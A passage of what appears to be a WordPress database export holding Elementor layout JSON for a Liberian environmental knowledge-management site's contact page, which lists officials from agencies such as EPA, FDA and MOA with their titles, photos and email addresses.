\\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:ballah_@yahoo.com\\\">ballah_@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24689,3654,'_elementor_edit_mode','builder'),(24690,3654,'_elementor_template_type','wp-page'),(24691,3654,'_elementor_version','3.0.16'),(24692,3654,'_wp_page_template','default'),(24693,3654,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a 